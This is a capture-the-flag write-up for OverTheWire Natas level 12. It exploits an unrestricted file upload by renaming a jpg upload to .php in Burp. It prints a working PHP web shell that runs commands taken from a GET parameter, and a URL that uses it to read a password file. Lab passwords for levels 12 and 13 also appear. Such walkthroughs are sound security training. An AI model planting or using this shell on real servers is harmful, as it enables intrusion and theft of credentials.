Level 12 Username : natas12 Password : EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 URL : http://natas12.natas.labs.overthewire.org
To solve this level, we first log into the natas12 application using the credentials provided above.
As we can see, the application allows a user to upload JPEG files to the server with a maximum size of 1KB. I uploaded the following image: to the server and the server responds back with the location of the file.
Upon inspection of the source code and checking Burp logs, we can see that the application changes the filename to some random characters and sends it in a POST request to the server to upload the file.
The file is uploaded at a random path using the function makeRandomPath($dir, $ext). The application does not perform any checks on the filetype of the file and merely stores it in a random directory. Therefore, it seems like the application is vulnerable to ‘ Unrestricted File Upload ‘. Let’s create a new php file and inject some code into it.
<?php $output = shell_exec('ls -lart'); echo "<pre>$output</pre>"; ?>
The application changes the extension of the file to a jpg. To bypass this, we can intercept the request in Burp and change the filename to php. This would keep the extension intact while the file is uploaded on the server.
After uploading, we can see that the application responds with a list of files and folder found in the upload folder as intended.
Let’s modify the shellcode to take input from the user. We can then ask the file to print content of /etc/natas_webpass/natas13.
<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>
The above shellcode would take a command from the GET variable cmd and print the output back to us. Let’s run the following command: ‘ http://natas12.natas.labs.overthewire.org/upload/pgfs4n9g3p.php?cmd=cat%20/etc/natas_webpass/natas13 ‘, replace pgfs4n9g3p.php with the randomized filename generated by the application and Voila! the application responds with the password for the next level.
Level 13 Username : natas13 Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY URL : http://natas13.natas.labs.overthewire.org